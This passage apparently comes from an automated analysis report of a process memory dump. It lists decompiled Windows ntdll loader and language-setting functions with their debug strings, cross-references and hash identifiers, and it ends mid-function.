                                                                      					_t280 = 0xc0000017;
                                                                      					_v40 = 0;
                                                                      					goto L48;
                                                                      				} else {
                                                                      					E0135F3E0(_t280, _v8, _t214);
                                                                      					_t285 = _t285 + 0xc;
                                                                      					_v48 = _t280;
                                                                      					_t283 = E01361370(_t280, 0x12f4e90);
                                                                      					_pop(_t267);
                                                                      					if(_t283 != 0) {
                                                                      						_t245 = _v48;
                                                                      						do {
                                                                      							 *_t283 = 0;
                                                                      							_t284 = _t283 + 2;
                                                                      							E0135BB40(_t267,  &_v68, _t245);
                                                                      							if(L013243C0( &_v68,  &_v24) != 0) {
                                                                      								_t275 = _t275 + 1;
                                                                      							}
                                                                      							_t245 = _t284;
                                                                      							_t283 = E01361370(_t284, 0x12f4e90);
                                                                      							_pop(_t267);
                                                                      						} while (_t283 != 0);
                                                                      						_v48 = _t245;
                                                                      						_t242 = _v52;
                                                                      					}
                                                                      					_t224 = _v48;
                                                                      					_t280 = 0;
                                                                      					if( *_v48 != 0) {
                                                                      						E0135BB40(_t267,  &_v68, _t224);
                                                                      						if(L013243C0( &_v68,  &_v24) != 0) {
                                                                      							_t275 = _t275 + 1;
                                                                      						}
                                                                      					}
                                                                      					if(_t275 == 0) {
                                                                      						L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                      						_v40 = _t280;
                                                                      						_v20 = _t280;
                                                                      					}
                                                                      					_t225 = _v8;
                                                                      					if(_v8 != 0) {
                                                                      						L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                      					}
                                                                      					_v8 = _t280;
                                                                      					goto L16;
                                                                      				}
                                                                      			}

                                                                      Strings
                                                                      • Kernel-MUI-Language-SKU, xrefs: 01323F70
                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 01323E97
                                                                      • Kernel-MUI-Number-Allowed, xrefs: 01323D8C
                                                                      • Kernel-MUI-Language-Allowed, xrefs: 01323DC0
                                                                      • WindowsExcludedProcs, xrefs: 01323D6F
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                      • API String ID: 0-258546922
                                                                      • Opcode ID: 3759cfd38347148a6b8f872d4f643bc0c53bd87ccdb8d5cc02586a0d8ec6894c
                                                                      • Instruction ID: c0d7e42f45f46c9151f2be2693c128fa6949b39e7dbd18419e9e9b2b965204be
                                                                      • Opcode Fuzzy Hash: 3759cfd38347148a6b8f872d4f643bc0c53bd87ccdb8d5cc02586a0d8ec6894c
                                                                      • Instruction Fuzzy Hash: 7BF14C72D00629EFCB11EF98C984EEEBBBDFF48654F15416AE905A7210D7749E01CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 44%
                                                                      			E01348E00(void* __ecx) {
                                                                      				signed int _v8;
                                                                      				char _v12;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				intOrPtr* _t32;
                                                                      				intOrPtr _t35;
                                                                      				intOrPtr _t43;
                                                                      				void* _t46;
                                                                      				intOrPtr _t47;
                                                                      				void* _t48;
                                                                      				signed int _t49;
                                                                      				void* _t50;
                                                                      				intOrPtr* _t51;
                                                                      				signed int _t52;
                                                                      				void* _t53;
                                                                      				intOrPtr _t55;
                                                                      
                                                                      				_v8 =  *0x140d360 ^ _t52;
                                                                      				_t49 = 0;
                                                                      				_t48 = __ecx;
                                                                      				_t55 =  *0x1408464; // 0x73b80110
                                                                      				if(_t55 == 0) {
                                                                      					L9:
                                                                      					if( !_t49 >= 0) {
                                                                      						if(( *0x1405780 & 0x00000003) != 0) {
                                                                      							E01395510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                      						}
                                                                      						if(( *0x1405780 & 0x00000010) != 0) {
                                                                      							asm("int3");
                                                                      						}
                                                                      					}
                                                                      					return E0135B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                      				}
                                                                      				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                      				_t43 =  *0x1407984; // 0xdf2b78
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                      					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                      					if(_t48 == _t43) {
                                                                      						_t50 = 0x5c;
                                                                      						if( *_t32 == _t50) {
                                                                      							_t46 = 0x3f;
                                                                      							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                      								_t32 = _t32 + 8;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_t51 =  *0x1408464; // 0x73b80110
                                                                      					 *0x140b1e0(_t47, _t32,  &_v12);
                                                                      					_t49 =  *_t51();
                                                                      					if(_t49 >= 0) {
                                                                      						L8:
                                                                      						_t35 = _v12;
                                                                      						if(_t35 != 0) {
                                                                      							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                      								E01349B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                      								_t35 = _v12;
                                                                      							}
                                                                      							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                      						}
                                                                      						goto L9;
                                                                      					}
                                                                      					if(_t49 != 0xc000008a) {
                                                                      						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                      							if(_t49 != 0xc00000bb) {
                                                                      								goto L8;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					if(( *0x1405780 & 0x00000005) != 0) {
                                                                      						_push(_t49);
                                                                      						E01395510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                      						_t53 = _t53 + 0x1c;
                                                                      					}
                                                                      					_t49 = 0;
                                                                      					goto L8;
                                                                      				} else {
                                                                      					goto L9;
                                                                      				}
                                                                      			}





















                                                                      Strings
                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0138932A
                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 01389357
                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 0138933B, 01389367
                                                                      • LdrpFindDllActivationContext, xrefs: 01389331, 0138935D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 0-3779518884
                                                                      • Opcode ID: 0c44e9942c743e7c1e7a6f13b202c0e9f63debc68413386d9988107d5ac6115d
                                                                      • Instruction ID: b9c0e9f12dc491648b1446737ee94b6955b5bd63120e6f245771d65c02ffe639
                                                                      • Opcode Fuzzy Hash: 0c44e9942c743e7c1e7a6f13b202c0e9f63debc68413386d9988107d5ac6115d
                                                                      • Instruction Fuzzy Hash: DD410732A003159FEB37AB9D8849B36B7E5EB4465CF0641EDEA0C57561E770BDC08781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E01328794(void* __ecx) {
                                                                      				signed int _v0;
                                                                      				char _v8;
                                                                      				signed int _v12;
                                                                      				void* _v16;
                                                                      				signed int _v20;
                                                                      				intOrPtr _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v40;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				intOrPtr* _t77;
                                                                      				signed int _t80;
                                                                      				signed char _t81;
                                                                      				signed int _t87;
                                                                      				signed int _t91;
                                                                      				void* _t92;
                                                                      				void* _t94;
                                                                      				signed int _t95;
                                                                      				signed int _t103;
                                                                      				signed int _t105;
                                                                      				signed int _t110;
                                                                      				signed int _t118;
                                                                      				intOrPtr* _t121;
                                                                      				intOrPtr _t122;
                                                                      				signed int _t125;
                                                                      				signed int _t129;
                                                                      				signed int _t131;
                                                                      				signed int _t134;
                                                                      				signed int _t136;
                                                                      				signed int _t143;
                                                                      				signed int* _t147;
                                                                      				signed int _t151;
                                                                      				void* _t153;
                                                                      				signed int* _t157;
                                                                      				signed int _t159;
                                                                      				signed int _t161;
                                                                      				signed int _t166;
                                                                      				signed int _t168;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_t153 = __ecx;
                                                                      				_t159 = 0;
                                                                      				_t121 = __ecx + 0x3c;
                                                                      				if( *_t121 == 0) {
                                                                      					L2:
                                                                      					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                      					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                      						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                      						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                      						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                      							L6:
                                                                      							if(E0132934A() != 0) {
                                                                      								_t159 = E0139A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                      								__eflags = _t159;
                                                                      								if(_t159 < 0) {
                                                                      									_t81 =  *0x1405780; // 0x0
                                                                      									__eflags = _t81 & 0x00000003;
                                                                      									if((_t81 & 0x00000003) != 0) {
                                                                      										_push(_t159);
                                                                      										E01395510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                      										_t81 =  *0x1405780; // 0x0
                                                                      									}
                                                                      									__eflags = _t81 & 0x00000010;
                                                                      									if((_t81 & 0x00000010) != 0) {
                                                                      										asm("int3");
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t159 = E0132849B(0, _t122, _t153, _t159, _t180);
                                                                      							if(_t159 >= 0) {
                                                                      								goto L6;
                                                                      							}
                                                                      						}
                                                                      						_t80 = _t159;
                                                                      						goto L8;
                                                                      					} else {
                                                                      						_t125 = 0x13;
                                                                      						asm("int 0x29");
                                                                      						_push(0);
                                                                      						_push(_t159);
                                                                      						_t161 = _t125;
                                                                      						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                      						_t143 = 0;
                                                                      						_v40 = _t161;
                                                                      						_t118 = 0;
                                                                      						_push(_t153);
                                                                      						__eflags = _t87;
                                                                      						if(_t87 != 0) {
                                                                      							_t118 = _t87 + 0x5d8;
                                                                      							__eflags = _t118;
                                                                      							if(_t118 == 0) {
                                                                      								L46:
                                                                      								_t118 = 0;
                                                                      							} else {
                                                                      								__eflags =  *(_t118 + 0x30);
                                                                      								if( *(_t118 + 0x30) == 0) {
                                                                      									goto L46;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_v32 = 0;
                                                                      						_v28 = 0;
                                                                      						_v16 = 0;
                                                                      						_v20 = 0;
                                                                      						_v12 = 0;
                                                                      						__eflags = _t118;
                                                                      						if(_t118 != 0) {
                                                                      							__eflags = _t161;
                                                                      							if(_t161 != 0) {
                                                                      								__eflags =  *(_t118 + 8);
                                                                      								if( *(_t118 + 8) == 0) {
                                                                      									L22:
                                                                      									_t143 = 1;
                                                                      									__eflags = 1;
                                                                      								} else {
                                                                      									_t19 = _t118 + 0x40; // 0x40
                                                                      									_t156 = _t19;
                                                                      									E01328999(_t19,  &_v16);
                                                                      									__eflags = _v0;
                                                                      									if(_v0 != 0) {
                                                                      										__eflags = _v0 - 1;
                                                                      										if(_v0 != 1) {
                                                                      											goto L22;
                                                                      										} else {
                                                                      											_t128 =  *(_t161 + 0x64);
                                                                      											__eflags =  *(_t161 + 0x64);
                                                                      											if( *(_t161 + 0x64) == 0) {
                                                                      												goto L22;
                                                                      											} else {
                                                                      												E01328999(_t128,  &_v12);
                                                                      												_t147 = _v12;
                                                                      												_t91 = 0;
                                                                      												__eflags = 0;
                                                                      												_t129 =  *_t147;
                                                                      												while(1) {
                                                                      													__eflags =  *((intOrPtr*)(0x1405c60 + _t91 * 8)) - _t129;
                                                                      													if( *((intOrPtr*)(0x1405c60 + _t91 * 8)) == _t129) {
                                                                      														break;
                                                                      													}
                                                                      													_t91 = _t91 + 1;
                                                                      													__eflags = _t91 - 5;
                                                                      													if(_t91 < 5) {
                                                                      														continue;
                                                                      													} else {
                                                                      														_t131 = 0;
                                                                      														__eflags = 0;
                                                                      													}
                                                                      													L37:
                                                                      													__eflags = _t131;
                                                                      													if(_t131 != 0) {
                                                                      														goto L22;
                                                                      													} else {
                                                                      														__eflags = _v16 - _t147;
                                                                      														if(_v16 != _t147) {
                                                                      															goto L22;
                                                                      														} else {
                                                                      															E01332280(_t92, 0x14086cc);
                                                                      															_t94 = E013E9DFB( &_v20);
                                                                      															__eflags = _t94 - 1;
                                                                      															if(_t94 != 1) {
                                                                      															}
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															 *_t118 =  *_t118 + 1;
                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                      															_t95 = E013461A0( &_v32);
                                                                      															__eflags = _t95;
                                                                      															if(_t95 != 0) {
                                                                      																__eflags = _v32 | _v28;
                                                                      																if((_v32 | _v28) != 0) {
                                                                      																	_t71 = _t118 + 0x40; // 0x3f
                                                                      																	_t134 = _t71;
                                                                      																	goto L55;
                                                                      																}
                                                                      															}
                                                                      															goto L30;
                                                                      														}
                                                                      													}
                                                                      													goto L56;
                                                                      												}
                                                                      												_t92 = 0x1405c64 + _t91 * 8;
                                                                      												asm("lock xadd [eax], ecx");
                                                                      												_t131 = (_t129 | 0xffffffff) - 1;
                                                                      												goto L37;
                                                                      											}
                                                                      										}
                                                                      										goto L56;
                                                                      									} else {
                                                                      										_t143 = E01328A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                      										__eflags = _t143;
                                                                      										if(_t143 != 0) {
                                                                      											_t157 = _v12;
                                                                      											_t103 = 0;
                                                                      											__eflags = 0;
                                                                      											_t136 =  &(_t157[1]);
                                                                      											 *(_t161 + 0x64) = _t136;
                                                                      											_t151 =  *_t157;
                                                                      											_v20 = _t136;
                                                                      											while(1) {
                                                                      												__eflags =  *((intOrPtr*)(0x1405c60 + _t103 * 8)) - _t151;
                                                                      												if( *((intOrPtr*)(0x1405c60 + _t103 * 8)) == _t151) {
                                                                      													break;
                                                                      												}
                                                                      												_t103 = _t103 + 1;
                                                                      												__eflags = _t103 - 5;
                                                                      												if(_t103 < 5) {
                                                                      													continue;
                                                                      												}
                                                                      												L21:
                                                                      												_t105 = E0135F380(_t136, 0x12f1184, 0x10);
                                                                      												__eflags = _t105;
                                                                      												if(_t105 != 0) {
                                                                      													__eflags =  *_t157 -  *_v16;
                                                                      													if( *_t157 >=  *_v16) {
                                                                      														goto L22;
                                                                      													} else {
                                                                      														asm("cdq");
                                                                      														_t166 = _t157[5] & 0x0000ffff;
                                                                      														_t108 = _t157[5] & 0x0000ffff;
                                                                      														asm("cdq");
                                                                      														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                      														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                      														if(__eflags > 0) {
                                                                      															L29:
                                                                      															E01332280(_t108, 0x14086cc);
                                                                      															 *_t118 =  *_t118 + 1;
                                                                      															_t42 = _t118 + 0x40; // 0x3f
                                                                      															_t156 = _t42;
                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															_t110 = E013461A0( &_v32);
                                                                      															__eflags = _t110;
                                                                      															if(_t110 != 0) {
                                                                      																__eflags = _v32 | _v28;
                                                                      																if((_v32 | _v28) != 0) {
                                                                      																	_t134 = _v20;
                                                                      																	L55:
                                                                      																	E013E9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                      																}
                                                                      															}
                                                                      															L30:
                                                                      															 *_t118 =  *_t118 + 1;
                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                      															E0132FFB0(_t118, _t156, 0x14086cc);
                                                                      															goto L22;
                                                                      														} else {
                                                                      															if(__eflags < 0) {
                                                                      																goto L22;
                                                                      															} else {
                                                                      																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                      																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                      																	goto L22;
                                                                      																} else {
                                                                      																	goto L29;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      													goto L56;
                                                                      												}
                                                                      												goto L22;
                                                                      											}
                                                                      											asm("lock inc dword [eax]");
                                                                      											goto L21;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						return _t143;
                                                                      					}
                                                                      				} else {
                                                                      					_push( &_v8);
                                                                      					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                      					_push(__ecx + 0x40);
                                                                      					_push(_t121);
                                                                      					_push(0xffffffff);
                                                                      					_t80 = E01359A00();
                                                                      					_t159 = _t80;
                                                                      					if(_t159 < 0) {
                                                                      						L8:
                                                                      						return _t80;
                                                                      					} else {
                                                                      						goto L2;
                                                                      					}
                                                                      				}
                                                                      				L56:
                                                                      			}













































                                                                      Strings
                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 01379C28
                                                                      • LdrpDoPostSnapWork, xrefs: 01379C1E
                                                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01379C18
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 2994545307-1948996284
                                                                      • Opcode ID: 1a146ae8dbb9bcca680c1bfabac9874945288ba00e44200fab7de424f6544f1f
                                                                      • Instruction ID: 20e17246fa58c5cbc8be31fe209b0336de1a238d26de2740724703b1f71d588d
                                                                      • Opcode Fuzzy Hash: 1a146ae8dbb9bcca680c1bfabac9874945288ba00e44200fab7de424f6544f1f
                                                                      • Instruction Fuzzy Hash: 9C912431A0022ADFEF29EF5DC880ABABBF5FF5431CB0541A9D905AB250D770E901CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E01327E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                      				char _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				intOrPtr _v20;
                                                                      				char _v24;
                                                                      				signed int _t73;
                                                                      				void* _t77;
                                                                      				char* _t82;
                                                                      				char* _t87;
                                                                      				signed char* _t97;
                                                                      				signed char _t102;
                                                                      				intOrPtr _t107;
                                                                      				signed char* _t108;
                                                                      				intOrPtr _t112;
                                                                      				intOrPtr _t124;
                                                                      				intOrPtr _t125;
                                                                      				intOrPtr _t126;
                                                                      
                                                                      				_t107 = __edx;
                                                                      				_v12 = __ecx;
                                                                      				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                      				_t124 = 0;
                                                                      				_v20 = __edx;
                                                                      				if(E0132CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                      					_t112 = _v8;
                                                                      				} else {
                                                                      					_t112 = 0;
                                                                      					_v8 = 0;
                                                                      				}
                                                                      				if(_t112 != 0) {
                                                                      					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                      						_t124 = 0xc000007b;
                                                                      						goto L8;
                                                                      					}
                                                                      					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                      					 *(_t125 + 0x34) = _t73;
                                                                      					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                      						goto L3;
                                                                      					}
                                                                      					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                                      					_t124 = E0131C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                      					if(_t124 < 0) {
                                                                      						goto L8;
                                                                      					} else {
                                                                      						goto L3;
                                                                      					}
                                                                      				} else {
                                                                      					L3:
                                                                      					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                      						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                      						L8:
                                                                      						return _t124;
                                                                      					}
                                                                      					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                      						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                      							goto L5;
                                                                      						}
                                                                      						_t102 =  *0x1405780; // 0x0
                                                                      						if((_t102 & 0x00000003) != 0) {
                                                                      							E01395510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                      							_t102 =  *0x1405780; // 0x0
                                                                      						}
                                                                      						if((_t102 & 0x00000010) != 0) {
                                                                      							asm("int3");
                                                                      						}
                                                                      						_t124 = 0xc0000428;
                                                                      						goto L8;
                                                                      					}
                                                                      					L5:
                                                                      					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                                      						goto L8;
                                                                      					}
                                                                      					_t77 = _a4 - 0x40000003;
                                                                      					if(_t77 == 0 || _t77 == 0x33) {
                                                                      						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                      						if(E01337D50() != 0) {
                                                                      							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                      						} else {
                                                                      							_t82 = 0x7ffe0384;
                                                                      						}
                                                                      						_t108 = 0x7ffe0385;
                                                                      						if( *_t82 != 0) {
                                                                      							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                      								if(E01337D50() == 0) {
                                                                      									_t97 = 0x7ffe0385;
                                                                      								} else {
                                                                      									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                      								}
                                                                      								if(( *_t97 & 0x00000020) != 0) {
                                                                      									E01397016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						if(_a4 != 0x40000003) {
                                                                      							L14:
                                                                      							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                      							if(E01337D50() != 0) {
                                                                      								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                      							} else {
                                                                      								_t87 = 0x7ffe0384;
                                                                      							}
                                                                      							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                      								if(E01337D50() != 0) {
                                                                      									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                      								}
                                                                      								if(( *_t108 & 0x00000020) != 0) {
                                                                      									E01397016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                      								}
                                                                      							}
                                                                      							goto L8;
                                                                      						} else {
                                                                      							_v16 = _t125 + 0x24;
                                                                      							_t124 = E0134A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                      							if(_t124 < 0) {
                                                                      								E0131B1E1(_t124, 0x1490, 0, _v16);
                                                                      								goto L8;
                                                                      							}
                                                                      							goto L14;
                                                                      						}
                                                                      					} else {
                                                                      						goto L8;
                                                                      					}
                                                                      				}
                                                                      			}




















                                                                      Strings
                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 013798A2
                                                                      • LdrpCompleteMapModule, xrefs: 01379898
                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 01379891
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                      • API String ID: 0-1676968949
                                                                      • Opcode ID: b30577a51676164ac43701f87eb5c8e8db999c17e6b11b14a244e49005a94a89
                                                                      • Instruction ID: fa245bd308d227fa5b0a430042856dfd17466ffa61c0e83b777755f9081d38e3
                                                                      • Opcode Fuzzy Hash: b30577a51676164ac43701f87eb5c8e8db999c17e6b11b14a244e49005a94a89
                                                                      • Instruction Fuzzy Hash: C251013160474ADBEB22DB5CC948B2A7BE4FB1132CF040669E9559B7E1D734ED00CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E0131E620(void* __ecx, short* __edx, short* _a4) {
                                                                      				char _v16;
                                                                      				char _v20;
                                                                      				intOrPtr _v24;
                                                                      				char* _v28;
                                                                      				char _v32;
                                                                      				char _v36;
                                                                      				char _v44;
                                                                      				signed int _v48;
                                                                      				intOrPtr _v52;
                                                                      				void* _v56;
                                                                      				void* _v60;
                                                                      				char _v64;
                                                                      				void* _v68;
                                                                      				void* _v76;
                                                                      				void* _v84;
                                                                      				signed int _t59;
                                                                      				signed int _t74;
                                                                      				signed short* _t75;
                                                                      				signed int _t76;
                                                                      				signed short* _t78;
                                                                      				signed int _t83;
                                                                      				short* _t93;
                                                                      				signed short* _t94;
                                                                      				short* _t96;
                                                                      				void* _t97;
                                                                      				signed int _t99;
                                                                      				void* _t101;
                                                                      				void* _t102;
                                                                      
                                                                      				_t80 = __ecx;
                                                                      				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                      				_t96 = __edx;
                                                                      				_v44 = __edx;
                                                                      				_t78 = 0;
                                                                      				_v56 = 0;
                                                                      				if(__ecx == 0 || __edx == 0) {
                                                                      					L28:
                                                                      					_t97 = 0xc000000d;
                                                                      				} else {
                                                                      					_t93 = _a4;
                                                                      					if(_t93 == 0) {
                                                                      						goto L28;
                                                                      					}
                                                                      					_t78 = E0131F358(__ecx, 0xac);
                                                                      					if(_t78 == 0) {
                                                                      						_t97 = 0xc0000017;
                                                                      						L6:
                                                                      						if(_v56 != 0) {
                                                                      							_push(_v56);
                                                                      							E013595D0();
                                                                      						}
                                                                      						if(_t78 != 0) {
                                                                      							L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                      						}
                                                                      						return _t97;
                                                                      					}
                                                                      					E0135FA60(_t78, 0, 0x158);
                                                                      					_v48 = _v48 & 0x00000000;
                                                                      					_t102 = _t101 + 0xc;
                                                                      					 *_t96 = 0;
                                                                      					 *_t93 = 0;
                                                                      					E0135BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                      					_v36 = 0x18;
                                                                      					_v28 =  &_v44;
                                                                      					_v64 = 0;
                                                                      					_push( &_v36);
                                                                      					_push(0x20019);
                                                                      					_v32 = 0;
                                                                      					_push( &_v64);
                                                                      					_v24 = 0x40;
                                                                      					_v20 = 0;
                                                                      					_v16 = 0;
                                                                      					_t97 = E01359600();
                                                                      					if(_t97 < 0) {
                                                                      						goto L6;
                                                                      					}
                                                                      					E0135BB40(0,  &_v36, L"InstallLanguageFallback");
                                                                      					_push(0);
                                                                      					_v48 = 4;
                                                                      					_t97 = L0131F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                      					if(_t97 >= 0) {
                                                                      						if(_v52 != 1) {
                                                                      							L17:
                                                                      							_t97 = 0xc0000001;
                                                                      							goto L6;
                                                                      						}
                                                                      						_t59 =  *_t78 & 0x0000ffff;
                                                                      						_t94 = _t78;
                                                                      						_t83 = _t59;
                                                                      						if(_t59 == 0) {
                                                                      							L19:
                                                                      							if(_t83 == 0) {
                                                                      								L23:
                                                                      								E0135BB40(_t83, _t102 + 0x24, _t78);
                                                                      								if(L013243C0( &_v48,  &_v64) == 0) {
                                                                      									goto L17;
                                                                      								}
                                                                      								_t84 = _v48;
                                                                      								 *_v48 = _v56;
                                                                      								if( *_t94 != 0) {
                                                                      									E0135BB40(_t84, _t102 + 0x24, _t94);
                                                                      									if(L013243C0( &_v48,  &_v64) != 0) {
                                                                      										 *_a4 = _v56;
                                                                      									} else {
                                                                      										_t97 = 0xc0000001;
                                                                      										 *_v48 = 0;
                                                                      									}
                                                                      								}
                                                                      								goto L6;
                                                                      							}
                                                                      							_t83 = _t83 & 0x0000ffff;
                                                                      							while(_t83 == 0x20) {
                                                                      								_t94 =  &(_t94[1]);
                                                                      								_t74 =  *_t94 & 0x0000ffff;
